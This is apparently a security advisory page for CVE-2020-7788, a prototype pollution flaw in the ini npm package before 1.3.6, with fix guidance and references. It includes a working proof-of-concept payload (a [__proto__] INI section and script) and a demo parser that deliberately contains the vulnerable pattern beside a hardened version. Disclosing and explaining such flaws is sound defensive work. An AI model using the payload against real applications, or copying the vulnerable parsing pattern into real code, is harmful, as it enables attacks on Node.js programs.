CVE-2020-7788: Prototype Pollution
Overview
The ini npm package before version 1.3.6 has a Prototype Pollution vulnerability. If an attacker submits a malicious INI file to an application that parses it with ini.parse, a section named `__proto__` is used directly as a property name on the result object, so every key in that section is written onto Object.prototype and inherited by every object in the application process. How much further this can be exploited depends on what the application does with the polluted properties.
Patches
This has been patched in 1.3.6.
Steps to reproduce
payload.ini:

```ini
[__proto__]
polluted = "polluted"
```

poc.js:

```js
var fs = require('fs')
var ini = require('ini')

var parsed = ini.parse(fs.readFileSync('./payload.ini', 'utf-8'))
console.log(parsed)
console.log(parsed.__proto__)
console.log(polluted)
```

Running the script against a vulnerable ini release (the bare identifier `polluted` resolves through the global object's prototype chain to Object.prototype, which the parse has just polluted):

```
> node poc.js
{}
{ polluted: 'polluted' }
{ polluted: 'polluted' }
polluted
```
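The following is an added example for this page, not code from the ini package or the advisory: a minimal INI parser written twice, once with the sink-selection pattern that makes `[__proto__]` land on Object.prototype, and once with the mitigation the 1.3.6 fix applies (a `__proto__` section is parsed into a throwaway object and a `__proto__` key is dropped) plus an own-property guard that goes beyond the patch. The function names, the `server` section and the sample input are constructed here.

```javascript
'use strict';
// Added example for this page, not code from the ini package. It shows the
// parser pattern behind CVE-2020-7788 in a minimal INI parser written two
// ways and probes Object.prototype after each run. Function names, the
// sample input and the "server" section are constructed for illustration.

// Constructed input in the shape of the advisory's payload.ini, plus a
// benign section so the hardened parser's normal output is visible.
const PAYLOAD = [
  '[server]',
  'port = 8080',
  '[__proto__]',
  'polluted = "polluted"',
].join('\n');

// Shared tokenizer: yields { section } or { key, value } records.
function* tokenize(text) {
  for (const raw of text.split(/\r?\n/)) {
    const line = raw.trim();
    if (!line || line[0] === ';' || line[0] === '#') continue;
    const sec = /^\[(.+)\]$/.exec(line);
    if (sec) {
      yield { section: sec[1].trim() };
      continue;
    }
    const kv = /^([^=]+)=(.*)$/.exec(line);
    if (kv) {
      yield { key: kv[1].trim(), value: kv[2].trim().replace(/^"(.*)"$/, '$1') };
    }
  }
}

// Vulnerable pattern (ini < 1.3.6 behaves like this): the section name is
// used directly as a property name. For "[__proto__]" the lookup
// out['__proto__'] returns Object.prototype, which is truthy, so it becomes
// the sink and every key in that section lands on Object.prototype.
function parseIniVulnerable(text) {
  const out = {};
  let p = out;
  for (const tok of tokenize(text)) {
    if (tok.section !== undefined) {
      p = out[tok.section] = out[tok.section] || {};
    } else {
      p[tok.key] = tok.value;
    }
  }
  return out;
}

// Hardened pattern: as in the 1.3.6 fix, a "[__proto__]" section is parsed
// into a throwaway object that is never attached, and a "__proto__" key is
// dropped. Beyond the patch, the sink lookup uses hasOwnProperty so that
// inherited names such as "constructor" cannot be selected as the sink.
function parseIniHardened(text) {
  const out = {};
  let p = out;
  const hasOwn = (o, k) => Object.prototype.hasOwnProperty.call(o, k);
  for (const tok of tokenize(text)) {
    if (tok.section !== undefined) {
      if (tok.section === '__proto__') {
        p = {}; // keep parsing the section, but discard it
        continue;
      }
      p = hasOwn(out, tok.section) ? out[tok.section] : (out[tok.section] = {});
    } else if (tok.key !== '__proto__') {
      p[tok.key] = tok.value;
    }
  }
  return out;
}

// Probe: a fresh object inherits anything written onto Object.prototype.
function globalPolluted(name) {
  return ({})[name];
}

// Runs both parsers and records the state of Object.prototype after each.
// The pollution left by the vulnerable run is deleted so it does not leak
// into the rest of the process.
function demo() {
  const result = {};
  result.before = globalPolluted('polluted');          // undefined
  result.vulnerable = parseIniVulnerable(PAYLOAD);
  result.afterVulnerable = globalPolluted('polluted'); // 'polluted'
  delete Object.prototype.polluted;
  result.hardened = parseIniHardened(PAYLOAD);
  result.afterHardened = globalPolluted('polluted');   // undefined
  return result;
}

console.log(demo());
```

The `hasOwnProperty` guard matters independently of the `__proto__` check: with the `out[section] || {}` idiom, a section named `constructor` would select `Object` itself as the sink, so any name that exists on the prototype chain is a candidate sink, not just `__proto__`.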
Other sources
A flaw was found in nodejs-ini. If an attacker submits a malicious INI file to an application that parses it with ini.parse, they will pollute the prototype on the application. This can be exploited further depending on the context.
Node.js ini module could allow a remote attacker to execute arbitrary code on the system, caused by a prototype pollution flaw. By sending a specially-crafted request, an attacker could exploit this vulnerability to execute arbitrary code or cause a denial of service condition on the system.
— IBM
This affects the package ini before 1.3.6. If an attacker submits a malicious INI file to an application that parses it with ini.parse, they will pollute the prototype on the application. This can be exploited further depending on the context.
Frequently Asked Questions
What is CVE-2020-7788?
CVE-2020-7788 is a Prototype Pollution vulnerability in the `ini` npm package.
How severe is CVE-2020-7788?
CVE-2020-7788 has a CVSS v3.1 base score of 9.8 (critical).
Which software packages are affected by CVE-2020-7788?
The `ini` npm package before version 1.3.6 is affected, as well as certain versions of `nodejs-ini`, `nodejs-nodemon`, `rh-nodejs14-nodejs`, `rh-nodejs12-nodejs`, `rh-nodejs12-nodejs-nodemon`, and `rh-nodejs10-nodejs`.
How can CVE-2020-7788 be fixed?
To fix CVE-2020-7788, upgrade the `ini` package to version 1.3.6 or later. Because `ini` is usually pulled in as a transitive dependency, run `npm ls ini` (or `npm audit`) to find every copy in the dependency tree, and for the distribution packages listed above install the vendor's fixed build.
Where can I find more information about CVE-2020-7788?
More information about CVE-2020-7788 can be found at the following references: [GitHub](https://github.com/npm/ini/commit/56d2805e07ccd94e2ba0984ac9240ff02d44b6f1), [npm](https://www.npmjs.com/advisories/1589), [Snyk](https://snyk.io/vuln/SNYK-JS-INI-1048974).